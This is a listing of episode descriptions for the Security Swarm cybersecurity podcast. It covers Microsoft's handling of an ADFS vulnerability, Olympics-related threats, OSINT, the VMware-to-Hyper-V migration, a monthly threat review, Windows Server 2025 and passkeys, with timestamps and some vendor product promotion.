The Security Swarm Podcast

In this episode, Andy sits down once again with Paul to continue their conversation about Microsoft’s struggles with security. The episode focuses on a recent report from ProPublica about a Microsoft whistleblower named Andrew Harris. The report alleges that Microsoft was aware of a serious vulnerability in its on-premises Active Directory Federation Services (ADFS) software that could have enabled the SolarWinds supply chain attack, but chose not to fix it or disclose it to customers.

Andy and Paul discuss how Microsoft’s focus on new features and cloud growth over security, as well as the desire to win lucrative government contracts, may have contributed to this decision. They also touch on the challenges faced by Microsoft’s security response team and the broader issue of security being seen as a cost center rather than a profit driver.

Key Takeaways:

• Microsoft ignored a serious ADFS vulnerability that could have enabled widespread attacks.
• Security is often viewed as a cost center at Microsoft, rather than a profit driver. This mindset led to the ADFS vulnerability being ignored, as fixing it was not seen as a priority compared to delivering new features and products.
• Microsoft was criticized for not being transparent about the ADFS vulnerability and not giving customers the option to implement mitigations, even if it meant sacrificing some functionality.
• The ADFS incident is symptomatic of broader security culture problems at Microsoft, where security is not always prioritized, and technical debt or legacy systems are not adequately addressed.

Timestamps:

(02:22) – Explaining the Whistleblower’s Allegations and the SolarWinds Attack

(07:32) – Vulnerability in ADFS and Microsoft’s “Security Boundaries” Argument

(13:06) – Why Was the Issue Swept Under the Rug?

(19:16) – The Challenges Faced by the Microsoft Security Response Center (MSRC)

(26:24) – Satya Nadella’s Comments on Prioritizing Security over New Features

(27:38) – The Controversy Around the “Recall” Feature in Windows 11

Episode Resources:

ProPublica Article

In this episode of the Security Swarm podcast, host Andy is joined by Romain Basset from Hornetsecurity to discuss the cybersecurity implications of the upcoming 2024 Olympic Games in Paris, France. The conversation explores how the geopolitical landscape, with ongoing global tensions and conflicts, creates a high-profile stage that threat actors may target for hacktivism, financial gain, or destabilization.

Throughout the episode, they highlight the increased risks leading up to the 2024 Games, noting that French infrastructure has already been targeted by various threat actor groups, including DDoS attacks. They discuss the blurring lines between cybercrime and geopolitical threats, with many threat actors now engaging in both financially and politically motivated attacks.

Key takeaways:

• The Olympics are a prime target for cyber-attacks due to the global attention and geopolitical tensions surrounding the event.
• Past Olympic games have seen a variety of cyber-attacks, including distributed denial-of-service (DDoS) attacks, malware, and false flag operations to mislead attribution.
• Cyber-attacks targeting the Olympics can have far-reaching consequences, including international chaos, disinformation campaigns, and real-world impacts on businesses and infrastructure.
• While the threat landscape is complex, the best defense is to focus on cybersecurity basics like user training, multi-factor authentication, and regular backups – rather than getting distracted by the latest “shiny object” threat.

Timestamps:

(01:15) – Why Cybersecurity is Important for the Olympics

(02:25) – Geopolitical Tensions and Threat Actors

(04:31) – Potential Cyber Attacks – Scams, Extortion, Disinformation

(06:50) – The 2018 Pyeongchang Olympics Cyber Attack

(12:48) – False Flags and Attribution Challenges

(16:05) – Overlap Between Cybercrime and Geopolitical Destabilization

(19:13) – Real-World Impacts of Geopolitical Cyber Tensions

(23:08) – Cybersecurity Best Practices and Advice

Episode Resources:

Read our blog about Russia’s notorious history of attacking the Olympics

Protect your business before it’s too late with 365 Total Protection

Train your users to spot phishing emails during the Olympics with Security Awareness Service

For our 50th episode of the Security Swarm Podcast, Andy and Eric Siron look back at the last 49 episodes of the show. They go through some core security topics and discuss whether they’re still relevant, how they’ve changed in comparison to the evolving threat landscape and provide updates on some of the major stories discussed. 

This is part 2 of a 2-part episode.

For our 50th episode of the Security Swarm Podcast, Andy and Eric Siron look back at the last 49 episodes of the show. They go through some core security topics and discuss whether they’re still relevant, how they’ve changed in comparison to the evolving threat landscape and provide updates on some of the major stories discussed.

This is part 1 of a 2-part episode, with part 2 coming next week.

Key Takeaways:

• AI-powered tools are a double-edged sword, capable of both beneficial and malicious applications.
• Botnets and malware continue to be a persistent threat, as attackers adapt and find new ways to circumvent disruptions.
• Email-based social engineering remains a significant vulnerability, as human nature makes it a difficult problem to solve.
• Immutability and backups are critical for protecting against ransomware and data loss.
• Securing cloud-based platforms like Microsoft 365 requires a nuanced approach, as the responsibility is shared between the provider and the customer.
• Security awareness training can be challenging to implement effectively, requiring a balance between engagement and cost.
• Navigating the relationship between IT administrators and CISOs is crucial for effective security management.

Timestamps:

(00:31) Using ChatGPT to create ransomware – still a relevant and evolving topic

(02:22) How tech pros should handle security news and zero-days

(09:09) The re-emergence of Emotet and the challenges of disrupting botnets

(12:04) The persistent problem of social engineering and email attacks

(13:25) The importance of immutability and backups against ransomware

(16:29) The security of Microsoft 365

(19:35) Deep dive on the QuickBot malware

(20:20) The necessity of advanced threat protection (ATP)

(22:58) Guidance on effective security awareness training

(25:41) Tips for IT admins on working with CISOs

(26:07) Microsoft’s throttling of legacy on-premises Exchange servers

(28:11) Discussing Episodes 12 and 13, recorded live at InfoSecurity Europe, on compliance and security horror stories

In this episode of the Security Swarm Podcast, host Andy is joined by Romain Basset, the Director of Technology Strategy at Hornetsecurity. They’re exploring the topic of Open-Source Intelligence (OSINT) – what it is, how threat actors use it to launch effective attacks, and the dangers it poses.

Throughout the episode, they discuss the ease with which OSINT can gather information using AI and other tools and provide examples of how it can be used in phishing, business email compromise, and even deep fake attacks. The conversation also touches on the importance of privacy awareness and security awareness training to mitigate these threats.

Key Takeaways:

• OSINT refers to publicly available information that threat actors can easily gather to launch targeted attacks. This includes social media profiles, online forums, data breach databases, and more.
• Threat actors are using OSINT to not only target individuals, but also find vulnerabilities in organizations’ web-facing software and infrastructure.
• Combating OSINT-powered attacks requires a multi-pronged approach of improving privacy awareness and implementing robust security awareness training programs.

Timestamps:

(02:24) – Definition of OSINT

(07:17) – How AI makes OSINT-powered attacks easier

(15:22) – Using OSINT to target organizations

(25:35) – Mitigating OSINT-powered attacks

Episode Resources:

Train your users with a personalised Security Awareness Service

Business Email Compromise: The $43 Billion Scam

In this episode of the Security Swarm Podcast, host Andy and recurring guest, Paul, talk about the challenges and opportunities organizations face amidst the Broadcom acquisition of VMware. They discuss the steep price hikes for VMware licenses and the security vulnerabilities recently discovered in VMware products.

This acquisition has prompted many businesses to consider alternative solutions, and the episode provides a comprehensive overview of the available options within the Microsoft ecosystem. They cover a range of migration strategies, including moving to the Microsoft ecosystem through Azure, Azure Stack HCI, and on-premises Hyper-V solutions.  Andy and Paul offer valuable insights into ensuring a secure and seamless transition away from VMware, making this episode essential listening for IT professionals navigating these significant changes.

Key takeaways:

• Broadcom’s Acquisition of VMware is Causing Major Disruption due to massive license cost increases of 300-500% for many organizations.
• Microsoft Hyper-V is a Viable Alternative to VMware. It offers a mature, enterprise-ready hypervisor that can be a cost-effective replacement for VMware.
• Azure Stack HCI Provides an On-Premises VMware Alternative. It provides a hyperconverged infrastructure solution with Hyper-V at the core, along with integration to Azure services for management and modernization.
• Security pitfalls can arise when organizations rush to migrate away from VMware due to the Broadcom situation. Proper planning, understanding the security posture of the new platform, and ensuring critical configurations like backup are in place are essential to mitigate risks.

Timestamps:

(02:51) – Vulnerabilities in VMware

(07:30) – Migrating to the Microsoft Ecosystem

(13:38) – On-Premises Microsoft Options

(38:45) – Security Considerations for Migrations

(44:52) – Pragmatic Approach to Platform Selection

Episode Resources:

Microsoft and Broadcom to Support License Portability

Paul’s article on options for migrating from VMware to Microsoft 

VMware Sandbox Escape Bugs

In this episode of the Security Swarm Podcast, host Andy and recurring guest Eric Siron discuss the Monthly Threat Review for June 2024.  They explore a new threat campaign distributing the Darkgate Malware using a technique called pastejacking. Additionally, they touch upon the 911 S5 Proxy Botnet takedown and how threat actors are exploiting Stack Overflow to distribute malware.

Key takeaways:

• Awareness of common tactics like pacejacking can help prevent falling victim to malware campaigns.
• Read the details of the Darkgate attack methods we show in the report and adjust your security posture as needed. If you’re in need of powerful, next-gen email security software, we’ve got you covered.
• If your organization is leveraging software from any online, public repository, take the time to review that repository and do a risk assessment. Threat-actors are increasingly using public software repos for malicious purposes.

Timestamps:

(03:15) – Insights into Email Threat Trends and Industry Targeting in Cybersecurity Landscape

(13:15) – Unveiling New Cybersecurity Threat Campaign using  Pastejacking

(23:31) – Massive Botnet Take Down and Arrest of Operator: A Victory Against Cybercrime

(29:29) – Beware of Malicious Packages: A Cautionary Case Study from Stack Overflow

Episode Resources:

Full Monthly Threat Report

Enhance Security Awareness by Training Employees

In this podcast episode, Andy and Paul discuss the upcoming release of Windows Server 2025 and the myriad security enhancements it will bring. They delve into various topics such as improvements to Active Directory, delegated managed service accounts, Kerberos protocol enhancements, SMB enhancements, hot patching, REFS file system for confidential computing, and extended security updates.  

Key takeaways: 

• Windows Server 2025 brings a host of security enhancements. 
• The release date of Windows Server 2025 is speculated to be in September 2024, coinciding with the release of System Center 2025. 

Timestamps: 

(07:05) – Enhancements in Active Directory Security and Numa Support: A Deep Dive

(13:19) – Revolutionizing Service Accounts: Delegated Managed Service Accounts Explained 

(20:28) – Revamping Windows Server Security: Say Goodbye to NTLM and Hello to Kerberos 

(28:15) – Revolutionizing SMB with Quick Protocol and Hot Patching in Windows Server 2025 

(32:34) – Revolutionizing Patching with Hot Patching in Windows Server and Azure 

(36:02) – Revolutionizing Data Protection with Resilient File System and Confidential Computing 

(39:34) – Exploring Confidential Compute, Server Upgrades, and Extended Security Updates in Windows Server Environment 

(42:37) – Windows Server 2025 Release Date Speculations and Future Episode Teasers 

Episode Resources: 

What’s new in Windows Server 2025 from MS Learn

In this episode of the Security Swarm Podcast, our host Andy and guest speaker Jan Bakker discuss passkeys in the Microsoft ecosystem. They cover topics such as the definition of passkeys, prerequisites, tips for implementation, and the user experience. They also highlight the user-centric enrollment process, the role of conditional access, and the potential challenges and advantages of transitioning to passkeys. 

Key takeaways: 

• Passkeys are a new authentication mechanism using the FIDO2 standard, providing a secure and user-friendly passwordless experience. 
• Device-bound passkeys are more secure but not transferable between devices, while syncable passkeys offer convenience but may introduce potential security risks. 
• Passkeys enhance security by being phishing-resistant and replacing traditional passwords and MFA methods. 
• The enrollment process involves using the Microsoft Authenticator app and ensuring prerequisites like device compatibility and Bluetooth connectivity. 
• Admins can enforce authentication method policies and conditional access to control user access and enhance security. 
• User education, interface improvements, and conditional access play crucial roles in a successful transition to passkeys. 

Timestamps: 

(03:04) – Unlocking the Future of Passkeys and the Evolution of Authentication 

(06:18) – Exploring the Security Benefits of Device Bound and Syncable Passkeys 

(14:54) – How to Prepare for Passkeys in Microsoft 365 

(23:03) – Navigating the Rollout of Passkeys for Enhanced Security: Admins vs End Users 

(29:03) – Maximizing Security with Passkeys, Conditional Access, and Authentication Policies 

(33:01) – Unveiling the Convenience of Device-Bound Passkeys in Vasquez for Microsoft 365 

Episode Resources: 

Previous episode on Passkeys

Blog post of Jan

Microsoft has recently been criticized for not prioritizing security enough. Following the CSRB’s Report on the Storm-0558 attack, Microsoft announced that security is now a top priority, with a commitment to address security issues before new product innovations. In this podcast episode, Andy and Paul Schnackenburg discuss the blog post which analyzes the Secure Future Initiative and its advancements.  

The conversation brings up the burning question: Was it the Cyber Safety Review Board (CSRB) that catalyzed Microsoft’s proactive stance on security? 

Key takeaways: 

• Microsoft is taking proactive steps to address security vulnerabilities and enhance its security measures following recent incidents. 
• The focus on protecting identities, enforcing multi-factor authentication, and improving network segmentation are crucial for bolstering security. 
• Efforts to align security actions with recommendations from the CSRB demonstrate a commitment to addressing criticisms directly. 

Timestamps:

(06:52)  Key Insights from Charlie Bell’s Blog Post Addressing Cyber Security Concerns

(11:22)  Enhancing Security Measures in Response to the CSRB’s Report

(21:22) Top Security Practices for Protecting Tenants and Production Systems

(24:46)  Enhancing Cloud Security with Micro Segmentation and Software Supply Chain Protection

(30:44)  Challenges and Considerations in Cloud Security Logging and Storage

(34:37)  Enhancing Cloud Security with Microsoft Sentinel and Vulnerability Reporting

(37:37)  Unveiling Common Vulnerabilities and the Importance of Secure Authentication in Cloud Environments

(42:34) Analyzing Microsoft’s Response to a Security Incident

Episode Resources:

The Blog Post from Charlie Bell

EP39: Are Passkeys the Future of Authentication?

Subcribe to our new YouTube Channel for more